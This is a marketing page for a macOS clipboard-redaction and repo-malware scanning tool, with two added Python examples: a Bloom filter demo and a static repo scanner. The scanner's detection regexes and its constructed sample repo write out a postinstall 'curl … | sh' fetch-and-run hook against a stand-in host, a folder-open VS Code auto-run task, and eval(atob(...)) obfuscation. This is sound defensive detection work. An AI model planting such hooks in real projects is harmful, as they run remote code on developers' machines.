100% local · zero bytes leave your Mac

Security companion for AI-assisted development

Your clipboard, redacted before it leaves your Mac.

safe-paste guards three layers — clipboard, repos, and packages — so credentials never reach an LLM, malicious code never runs on `code .`, and compromised dependencies never reach `npm install`. 100% local, 0 bytes over the network.

Free · macOS 14.0+ only · Universal (Apple Silicon + Intel)

  • 100+ credential patterns detected
  • 1.5M+ compromised passwords verified offline
  • 0 bytes sent over the internet
  • 25+ repo malware heuristics
  • <3MB memory footprint for full detection
  • ~10ns average lookup time per query

Six ways we protect

Three layers, one app. Clipboard, repos, packages.

Every direction your code moves is covered — text leaving you, repositories arriving at you, and dependencies in between.

Clipboard

Vibe Coding Mode

Invert the shortcuts so Cmd+V becomes the protected paste and Cmd+Opt+V the raw escape hatch. Forgetting to protect stops being possible.

Clipboard

Image & PDF OCR Redaction

Screenshots, photos and PDFs scanned by Apple Vision in 30+ languages. Surgical black rectangles only over secrets. EXIF/GPS stripped.

Clipboard

Compromised Password Alerts

1.5M passwords from real breaches checked against an on-device bloom filter. 0.1% false positives, 0% false negatives, zero network.
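
The numbers above follow from standard Bloom filter sizing. This is an added example, not safe-paste's own code: it assumes optimal sizing and SHA-256 double hashing, neither of which the page specifies, and `bloom_parameters`, `BloomFilter` and `measure` are hypothetical names.

```python
import hashlib
import math

def bloom_parameters(n, p):
    """Optimal bit count m and hash count k for n items at false-positive rate p."""
    m = math.ceil(-n * math.log(p) / (math.log(2) ** 2))
    k = max(1, round(m / n * math.log(2)))
    return m, k

class BloomFilter:
    def __init__(self, n, p):
        self.m, self.k = bloom_parameters(n, p)
        self.bits = bytearray((self.m + 7) // 8)

    def _positions(self, item):
        # Double hashing (assumed scheme): k indexes from two halves of one digest.
        d = hashlib.sha256(item.encode("utf-8")).digest()
        h1 = int.from_bytes(d[:8], "big")
        h2 = int.from_bytes(d[8:16], "big") | 1
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def __contains__(self, item):
        # Every bit set at insert time stays set, so a member can never be missed.
        return all(self.bits[pos // 8] >> (pos % 8) & 1 for pos in self._positions(item))

def measure(n=2000, p=0.001, probes=20000):
    """Insert n constructed strings, then probe with strings that were never added."""
    bf = BloomFilter(n, p)
    members = [f"breached-{i}" for i in range(n)]
    for s in members:
        bf.add(s)
    false_negatives = sum(s not in bf for s in members)
    false_positives = sum(f"fresh-{i}" in bf for i in range(probes))
    return false_negatives, false_positives / probes

if __name__ == "__main__":
    m, k = bloom_parameters(1_500_000, 0.001)
    print(f"1.5M items at 0.1%: {m} bits = {m / 8 / 1e6:.2f} MB, k = {k}")
    print("false negatives, measured false-positive rate:", measure())
```

At 1.5M entries and a 0.1% target, the optimal filter is about 21.6 million bits (roughly 2.7 MB) with 10 hash functions, which is consistent with the under-3MB footprint quoted above.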

Package

Malicious Dependency Detection

Copy a `pip install` from an LLM chat? We flag it before the paste hits the terminal. Covers npm, PyPI, pub today — more on the way.

New Repo

Repo Heuristic Scanner

25+ rules detect `.vscode/tasks.json` auto-run, `postinstall` curl|sh, eval+atob obfuscation, credential exfil patterns. Catches Contagious Interview repos before `code .` runs anything.
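
Three of the patterns named above, written as static checks. This is an added example, not Vibe Sentinel's rule set: the rule names, the regexes and the constructed sample repo are assumptions, and nothing in the scanned tree is executed.

```python
import json, re, tempfile
from pathlib import Path
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
EVAL_ATOB = re.compile(r"\beval\s*\(\s*atob\s*\(")

def load_json(path):
    """Parsed JSON object, or None if not a strict-JSON dict (tasks.json may be JSONC)."""
    try:
        doc = json.loads(path.read_text(errors="replace"))
    except json.JSONDecodeError:
        return None
    return doc if isinstance(doc, dict) else None

def scan_repo(root):
    """Static scan: returns sorted (rule, relative path) findings, executes nothing."""
    root, findings = Path(root), []
    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():
        doc = load_json(tasks)
        if doc is None:  # comments or malformed JSON: fall back to a text match
            auto = "folderOpen" in tasks.read_text(errors="replace")
        else:
            auto = any(isinstance(t, dict) and (t.get("runOptions") or {}).get("runOn") == "folderOpen"
                       for t in doc.get("tasks") or [])
        if auto:
            findings.append(("vscode-task-runs-on-folder-open", ".vscode/tasks.json"))
    for pkg in root.rglob("package.json"):
        scripts = (load_json(pkg) or {}).get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if isinstance(scripts, dict) and PIPE_TO_SHELL.search(str(scripts.get(hook, ""))):
                findings.append((f"{hook}-pipes-download-to-shell", pkg.relative_to(root).as_posix()))
    for js in root.rglob("*.js"):
        if EVAL_ATOB.search(js.read_text(errors="replace")):
            findings.append(("eval-atob-obfuscation", js.relative_to(root).as_posix()))
    return sorted(findings)

def build_sample_repo(root):
    """Constructed sample input: a tiny repo containing all three patterns as inert text."""
    (root / ".vscode").mkdir(parents=True)
    (root / ".vscode" / "tasks.json").write_text(json.dumps({"version": "2.0.0", "tasks": [
        {"label": "prep", "command": "node setup.js", "runOptions": {"runOn": "folderOpen"}}]}))
    (root / "package.json").write_text('{"scripts": {"postinstall": "curl -s https://example.invalid/s.sh | sh"}}')
    (root / "setup.js").write_text('eval(atob("Y29uc29sZS5sb2coMSk="));\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample_repo(Path(d))
        print(scan_repo(d))
```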

New Repo

Watched Folders

Point Vibe Sentinel at `~/Projects`, `~/Downloads`, any folder. FSEvents detects new repos arriving (clone, zip, drag) and offers a scan before you open them.

The shortcut you already know

Cmd+V, but safe by default.

Most clipboard tools require you to remember a special shortcut. With Vibe Mode on, the muscle memory shortcut becomes the protected one.

Vibe Mode OFF (default)

  • ⌘ V → System paste
  • ⌘ ⌥ V → Protected paste

Vibe Mode ON

  • ⌘ V → Protected paste
  • ⌘ ⌥ V → Raw paste (escape hatch)

Forgetting to protect stops being possible.

Honest comparison

How we compare.

Every other tool runs after a secret has already left the device. We run before the paste.

  safe-paste Cloud scanners Enterprise DLP
Works offline
No agent install
Coverage of tokens 100+ 50–300 100–500
Detects leaked passwords ✓ (offline) API call
Redacts text in images ✓ (Vision OCR)
Redacts text in PDFs
Covers QR codes
Strips EXIF / GPS ✓ (auto)
Price $$ $$$ $$$$$
Setup time 30 s days weeks

Fits where work already happens

Built for every team that copies secrets all day.

For developers

Pasting cURLs into AI chats, snippets into Slack threads, configs into pull requests. Secrets vanish before they hit the network.

  • "Shared a log in #incidents and my GitHub token leaked."
  • "Pasted a cURL into ChatGPT with a Bearer token in the header."

For security & IR teams

Triaging incidents means copying customer logs around. Strip keys, hashes and tokens before they land in tickets, reports, or chat.

  • "Cleaning prod outputs for postmortems."
  • "Sharing PCAP excerpts with vendors without leaking session cookies."

For support engineers

Customers send screenshots full of tokens. PDFs with API keys on page one. Your clipboard stays clean by default.

  • "Screenshotted a customer dashboard with their Stripe key visible."
  • "Pasted a config file into a ticket without redacting."

For IT and MDM admins

A clipboard tool with zero cloud component, signed updates, EU-routable storage, and a documented threat model. Deploy to 1 Mac or 1000.

  • "Compliance officer asked: where does clipboard data go? Now you can answer in one sentence."
  • "Jamf-deployable via standard pkg."

For devs using AI tools

Cursor, Claude Code, Windsurf — code arrives in your repo faster than you can review it. Vibe Sentinel checks repos, manifest files and clipboard snippets in parallel so an LLM hallucinating a typosquat or a recruiter sending a malicious `tasks.json` never auto-runs on you.

  • "LLM suggested an npm package that turned out to be a typosquat — flagged before install."
  • "Cursor opened a folder I just cloned; Vibe Sentinel already had findings ready."

For job seekers in tech

Recruiters send "technical assessment repos" via LinkedIn. The Contagious Interview campaign abuses `.vscode/tasks.json` to run malware the moment you `code .`. Watched Folders catches the clone before you open the project.

  • "Cloned a 'take-home assignment' — notification fired with 5 critical findings before I opened it."
  • "Recruiter repo on GitHub looked clean in browser; static heuristics caught the hidden payload locally."

Built on technology trusted by the industry

Apple Vision

Native on-device OCR · 30+ languages

Sparkle 2

EdDSA-signed auto-updates

OSV.dev

Malicious package advisory feed

SecLists

Compromised password dataset

Cloudflare

Edge delivery, zero analytics PII

iCloud

E2EE settings sync, no login

Stop leaking. Start pasting safely.

Free for personal and commercial use. macOS 14+. Universal binary.